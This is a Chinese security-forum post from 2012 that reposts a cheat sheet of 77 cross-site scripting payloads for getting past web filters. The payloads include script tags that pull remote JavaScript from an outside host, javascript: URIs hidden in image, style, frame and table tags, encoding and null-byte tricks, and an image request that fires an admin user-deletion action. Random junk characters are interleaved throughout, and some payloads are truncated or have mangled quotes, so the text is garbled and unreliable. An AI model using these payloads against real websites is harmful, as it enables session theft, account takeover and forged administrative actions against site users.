貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
! ~" `$ R6 |& t/ \+ F
6 s# Q6 p, A; L+ p (1)普通的XSS JavaScript注入
# A4 o3 [. X# a3 u <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; z% M7 Q A7 b0 B
2 Y& f+ i5 _4 m+ B f a* Y6 ] (2)IMG标签XSS使用JavaScript命令
# m% x: `: k2 u) x. S/ A <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! d+ F4 E! p- W
- A a' D# [! M% _, [ K( O' }. L
(3)IMG标签无分号无引号# L2 l" x6 n3 Y/ J1 C
<IMG SRC=javascript:alert(‘XSS’)>* H, ?& v0 D0 n o/ I$ n. ?$ A
. V6 y( }( m% X) U
(4)IMG标签大小写不敏感
' }+ S' W, B* }: @ <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
$ |2 F5 F0 N( \2 |5 F2 N% t/ g5 L Q
(5)HTML编码(必须有分号)% Z0 Y) Q3 X6 M0 y" S7 T9 L9 W
<IMG SRC=javascript:alert(“XSS”)>
: C' m, \' R3 c/ J* t" a
( k* `2 ]+ H# y/ {4 s (6)修正缺陷IMG标签
" B, u/ H7 ^6 Q: D$ Y; V9 G1 {) { <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 `& I7 a( Y4 X3 g2 s
4 T- ~* G- j8 p% p (7)formCharCode标签(计算器)1 U, ]- v6 | f/ [) f( {
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
: g6 Q/ a+ A# Q) \# k" ^% E; ]+ y- q$ d N
(8)UTF-8的Unicode编码(计算器)
1 F# Q, @, I$ h l% x" U _1 P <IMG SRC=jav..省略..S')>
: K: w9 Q" A( d1 e9 z. ^ K: h' u3 k! d6 ]( u
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
; {6 C& @, y% F! g+ v4 q2 r <IMG SRC=jav..省略..S')>3 Q1 u/ A$ D# \5 Q: b7 i# s
6 v) [2 i. {5 s. F. i
(10)十六进制编码也是没有分号(计算器)
# ]2 h6 M; r4 @+ B- S$ w <IMG SRC=java..省略..XSS')>6 A+ R5 X( d3 [6 r a
' e) X; n9 j; v, y+ Z" A (11)嵌入式标签,将Javascript分开) z3 y$ e6 \( o/ l( x3 ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>- } M( p: `% h0 J8 b
2 e! j+ X; t7 t2 C. G7 q
(12)嵌入式编码标签,将Javascript分开
9 y6 ]- b. V! I$ w& \% N <IMG SRC=”jav ascript:alert(‘XSS’);”>+ `/ k% z/ W" V2 K" |9 L
9 c: j' V0 p/ P( ? (13)嵌入式换行符 m' O& H& j/ c
<IMG SRC=”jav ascript:alert(‘XSS’);”>& `6 I, G, M$ D. J* T% y" {
' @* g! Z, z' X! ~! L& ~ (14)嵌入式回车
5 {; ~" d( I5 H% N- f4 C& v6 Q <IMG SRC=”jav ascript:alert(‘XSS’);”>
3 N% E' W* E/ V) y& f; B/ X
: @; f! R9 c4 A$ P (15)嵌入式多行注入JavaScript,这是XSS极端的例子* Z/ [+ U8 a+ K
<IMG SRC=”javascript:alert(‘XSS‘)”>
0 P; u4 s; {5 u$ I1 B* X! \ _0 M2 T: C; F5 G( W
(16)解决限制字符(要求同页面)
# D7 P V3 X/ O( @" m$ a <script>z=’document.’</script>
" N+ _4 x% R+ c; }" R9 w <script>z=z+’write(“‘</script>" f- ]( R1 s p( i. {$ O
<script>z=z+’<script’</script>2 B$ n; }+ L5 z
<script>z=z+’ src=ht’</script>
- p5 l% @4 p x <script>z=z+’tp://ww’</script>
3 r2 u$ Y* x+ p( N- r <script>z=z+’w.shell’</script>& ~$ N( C0 [2 ]& {
<script>z=z+’.net/1.’</script>' i! v! Y5 p/ X2 b$ S' [ T) ~+ d/ D
<script>z=z+’js></sc’</script>
; a' A( @ Q0 ^ <script>z=z+’ript>”)’</script>% x+ u% A/ j! O4 T4 k0 v! `
<script>eval_r(z)</script>
$ g/ k% o% K" T
( c! s: j- l; T5 e6 T (17)空字符* T( E! N3 l% v$ ^
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out( V+ ?% }" o* i2 X; k/ Y
# ?# E. s% |" c4 T, T. Z: S; V$ L
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 y, z2 ]6 S! i; \ perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# h$ ~4 m; l2 ~
# g; p+ a7 M% p9 a+ i) D+ }
(19)Spaces和meta前的IMG标签- Y/ H \5 j/ I1 y& Q) p7 t
<IMG SRC=” � javascript:alert(‘XSS’);”>
9 I1 V% O, X( ~4 } T! M3 m; @4 R
5 v- x+ J- }9 f" m6 x (20)Non-alpha-non-digit XSS
n1 K; y5 I' C7 R. T <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
- ~! p$ g- [1 P S- H* Q& j# r
: X7 g/ v9 H6 a f- _ (21)Non-alpha-non-digit XSS to 2
% ^* X' Y& g) o& }6 r <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>% {# e* k/ p% ?- j% k
, d `: @, U' m
(22)Non-alpha-non-digit XSS to 3
Y; r* g% H- q3 X2 i8 ?- g <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>4 r; E) w8 M" ^6 V
5 e: W2 v0 w4 ?( E% n
(23)双开括号1 @4 v5 S3 |% z% D
<<SCRIPT>alert(“XSS”);//<</SCRIPT>$ h7 e0 E7 h" Z
6 @2 G _, M" Q" r8 t- K$ ~ (24)无结束脚本标记(仅火狐等浏览器)6 y r6 O. _) y( N9 N" X
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
6 L, `( A) Q5 l9 d
9 v+ p' s! G! W0 @* U0 \# e9 i (25)无结束脚本标记28 a4 D# z8 t6 {- S5 A
<SCRIPT SRC=//3w.org/XSS/xss.js>) F: A: N" `- F D) q
0 [+ l' E6 B/ D3 u (26)半开的HTML/JavaScript XSS
) ~, Z! q+ X" {) I# j <IMG SRC=”javascript:alert(‘XSS’)”, H4 `7 e7 C. t* D" t4 \
0 \$ y+ Y7 V) W8 @: F2 z, A (27)双开角括号' R' i: g) B! R
<iframe src=http://3w.org/XSS.html <
) L6 Q2 o( b2 a. S& v; z( x5 W/ A. r/ ?1 X3 I$ k
(28)无单引号 双引号 分号 u0 j; m" ^( e
<SCRIPT>a=/XSS/
s- k4 Y% A3 m+ I alert(a.source)</SCRIPT>2 E. j/ i7 U6 |
/ L8 l# u* a- R (29)换码过滤的JavaScript
: a3 \+ d9 d0 L1 ] \”;alert(‘XSS’);//
$ j, p8 i" b( i# h
' R3 \' h! M$ W7 w+ ^ (30)结束Title标签0 O6 \& u: o7 n1 {6 k" r' H$ ^0 v
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>* g& s+ M+ @) V( a3 B% R8 w1 P
% Y: H1 t4 H c1 U! J/ D1 @# M; Q
(31)Input Image
- D) N* l/ i; {$ J, Q/ Y" D <INPUT SRC=”javascript:alert(‘XSS’);”>
/ t2 X% ]$ \9 g m+ D7 q3 j& P/ E1 x( {( S& |9 _9 m
(32)BODY Image
( h/ z# A3 ]( \+ S7 j9 l <BODY BACKGROUND=”javascript:alert(‘XSS’)”>8 x+ Y7 R5 G( b0 a) C7 [& [- m
) Z! B" z9 u1 M* z4 d3 w
(33)BODY标签
+ k; _! p3 M- C$ _5 s j; O <BODY(‘XSS’)>
- a% \- `: F1 g3 O1 ~- j
8 X( G0 j' o; w! x (34)IMG Dynsrc
$ b- i" c0 d+ W! m# w$ {3 V <IMG DYNSRC=”javascript:alert(‘XSS’)”>
3 P, J' k% h$ g7 k) s6 R3 g2 N( q$ {. ]6 f! v' m- D, T, H
(35)IMG Lowsrc
9 w& W. F0 e1 L8 j0 ]9 y' A! } <IMG LOWSRC=”javascript:alert(‘XSS’)”>
+ ^2 g" h3 ~, o0 y K/ c
' h' w* ~6 F! \3 J' l5 Y (36)BGSOUND# ]5 {4 K6 z4 ~' A- _1 H
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
. y* [& a$ M& ~! h( ?% e( X
4 V7 k! r8 F, m* i! A (37)STYLE sheet0 V7 E/ j, P( t5 W
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, k: S0 G, f6 R& M
# x, Q \2 U: ~; j y" V- @ (38)远程样式表
$ V, K$ L" x! |. v" n* i0 E <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
. H5 U0 u0 M( h& V- c9 j8 I" M' {% B5 v9 d% j( x' \5 m
(39)List-style-image(列表式)6 J' V( D3 |& t+ D4 e
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
* ~9 Y% B3 \2 @
% n; O1 ?4 H3 R( r W- j/ s$ F% w* q( L (40)IMG VBscript
, a& E4 R$ f& _: R3 u <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS; m* O/ r+ L+ ?% R/ M/ X5 ~
; f% c/ t4 U& S
(41)META链接url8 a, Q$ P1 H7 r) S& c/ t0 j0 r
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>/ x9 H# c: Q9 E. f: f0 G
. u+ ?: k5 Q; D- ` (42)Iframe
! n" _) i4 C" E _ <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
3 X( d/ O( p0 B$ m, x. n; h5 k/ J! f1 B' S0 p& Z6 {& j
(43)Frame
$ n" O; y7 Q$ L3 m% r2 t1 O <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
. l8 b5 y o" }+ x+ H, b, j; u. R3 D7 w$ k8 H4 R& f
(44)Table6 M7 m, |' C# x! Z) s: P7 C' d
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
. s) o p( w; ]0 J& p7 q5 L) o( }8 W& ~8 V, T& r' I$ A( J
(45)TD
+ P6 v1 c( n6 q% ] <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>5 x* M7 K& M# k: a6 V# _* e0 @
! J) t* A5 Z6 n9 G! O4 Q
(46)DIV background-image& M5 F0 W5 Z0 o6 ^& I" \4 l7 d
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
# _8 V4 }$ l& S0 c. ^6 F. H! {
9 Z9 c* I5 Y+ v! w# R/ i (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)" v# r5 L& M) I. J/ }% q( l
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
p6 l: Y( e/ s* D8 g# L0 @2 J! X9 z/ o d2 U$ e1 S0 Y4 N
(48)DIV expression
* U" q1 P# f! R9 W$ W <DIV STYLE=”width: expression_r(alert(‘XSS’));”>1 {# i M: [3 F1 l
# x. I9 k2 e- p2 N# L
(49)STYLE属性分拆表达3 q, N* D) u7 W' V0 ?( {
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ _+ e2 N; W: ]
* C+ B' Y+ F8 |* l u% s; E (50)匿名STYLE(组成:开角号和一个字母开头). E* x$ R; a/ f0 {2 H9 V% _5 g
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
2 ]4 \3 a# r- g* ~4 u( \ U1 c( a9 x' e: k: s6 c" M4 G
(51)STYLE background-image
# q+ E$ ?$ \7 t: S <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
& [. d! h0 A ]. j7 I& g
* _/ p, d! d2 n: ~ (52)IMG STYLE方式. ~7 i0 K- f: L! H# p7 `, Z
exppression(alert(“XSS”))’>
8 T4 N( D: S: |. V; m
% M' H" {" j' u6 E% W/ x" C (53)STYLE background' d6 r3 z8 K% ~3 k) L! I
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
/ u8 L9 [; [1 i5 u u y! O$ ~$ a, T' y8 m& c5 P8 T9 p( T
(54)BASE
3 O! E0 |9 N$ t- w7 K { <BASE HREF=”javascript:alert(‘XSS’);//”>7 ?# t- L$ j, v
8 C) u0 p u5 r: T
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 O# n$ W. P$ t l; B' G <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>8 u* p3 S) [- i& q
7 k: r3 F; t% W) X+ i
(56)在flash中使用ActionScrpt可以混进你XSS的代码
1 ~) d3 X$ ~2 J, n) C) y$ a% K a=”get”;
' o2 P2 }% |0 c1 z3 \2 D b=”URL(\”";7 W7 w" }% \" R( Q O. L
c=”javascript:”;
7 C3 {2 j, C+ [ d=”alert(‘XSS’);\”)”;: J5 D/ M, m! ^4 E9 U# W
eval_r(a+b+c+d);0 V/ R% @" D# _* ~' U) s" k6 }" T
7 O, V9 d8 O0 A
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; S. {" ?4 c1 f7 I! w <HTML xmlns:xss>2 h" W: P! x: m* N3 S7 `% }
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
# S" d Q; ~! a; A <xss:xss>XSS</xss:xss>( P! l. {! y* ? J8 S
</HTML># K) Z- E1 F7 v0 u ]/ M2 q, p% h
4 c% |/ c. e' i- S
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用2 j9 L9 V4 {0 i; h
<SCRIPT SRC=””></SCRIPT>1 G$ z# K$ C4 W* o. j* H5 I
( L+ P4 ?+ n: p( q4 U/ t2 [
(59)IMG嵌入式命令,可执行任意命令
5 E) n) M% m8 T <IMG SRC=”http://www.XXX.com/a.php?a=b”>
- D5 G/ u" J# r6 a3 V& Q8 S; M/ Y% ^0 ~
(60)IMG嵌入式命令(a.jpg在同服务器)
$ X" y4 c' w8 g9 k {# J Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
7 e4 L( B# a% Z4 H4 J0 S j5 y2 V+ K0 p$ i7 x
(61)绕符号过滤4 y6 z0 P, m) z2 q
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>6 K, h; u6 ^ L" E w# `5 W
" b X- D8 y+ d- @7 Y, f G2 p (62)
4 l0 e0 n1 T- G; H2 c5 h <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>2 m0 N# f, E% X2 r7 Q9 e3 B/ @2 Z
- j2 Y$ [( J! x: K5 w
(63)6 U* P; l9 g) H
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
8 @# I- s4 d; U" `
/ j3 {: W; C0 p- {% G0 M (64)
) P) ]' b0 ^' Z9 H! ~ <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
B: W+ ^* |# q4 j2 z
! {: ^" G# d! v1 c4 p6 B1 B (65)
2 ~- W# h+ Y U. c1 O <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>& `3 j: t2 K8 B2 _
$ g# y7 j$ E. w8 Z$ p! W/ o (66); K# @) L! s# _/ t/ V: O0 Q; E, {
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>3 d: T2 ]& v3 `, X
8 A1 R0 x/ y! C2 U$ t (67)
8 P% O6 T4 X8 X2 f; S5 n8 |0 |; P! B <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
|6 h0 ]6 J* Y5 x$ ]8 } i" L8 \- g. H, M. q
(68)URL绕行
% d5 C0 A8 y' f( Z <A HREF=”http://127.0.0.1/”>XSS</A>
, @0 Z! D5 W8 j3 N* N5 ^$ g/ k
7 m" n- z, S; F* s0 ~ (69)URL编码
, M! a' D) _# f5 h <A HREF=”http://3w.org”>XSS</A> S* n: Z& N. Z, J
" l1 v s8 J4 v' }4 y" ]# N
(70)IP十进制
" C% o+ W/ R* J6 e \ <A HREF=”http://3232235521″>XSS</A># V: u5 X$ k3 z6 x3 l% V0 W8 F
- V% C4 `% N! N" B, S$ i h (71)IP十六进制
( L" b3 [3 f% L. h/ m* c, l# V. A <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>' c1 ^% J5 q0 U- }; n2 [) ?
! e" I6 V' h& s9 a# _. S' q (72)IP八进制' Q7 j; K+ V) j. T* n( M0 ? L# p0 Y
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
& C+ Y+ g s$ w9 D
3 ?% D. u* r. q (73)混合编码! a$ F" _1 x6 e
<A HREF=”h! o3 v: M* S6 F' J
tt p://6 6.000146.0×7.147/”">XSS</A>0 V( a5 P1 Q: x/ s3 |
; }* | h, X5 Q4 e& w, ~3 s
(74)节省[http:]9 `, L v2 m7 T5 l9 D& ^( r
<A HREF=”//www.google.com/”>XSS</A>1 G% S' }) B8 L: O1 X% _- U5 n
3 n' t$ d! J. u1 X2 a (75)节省[www]
$ N$ e, M0 Y% f6 u( a3 T <A HREF=”http://google.com/”>XSS</A>
- h' V! E' b4 R. J4 H# j+ ?6 r: D+ f2 F' ^+ k/ A: }
(76)绝对点绝对DNS
3 ]/ t- t& k/ W# l4 e! {( W <A HREF=”http://www.google.com./”>XSS</A>
* p4 D9 e3 w$ j; ]4 D) y) o( Z
' L3 G! |4 [* x6 ^ L. V" a (77)javascript链接' p. b1 O5 y- J+ w
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对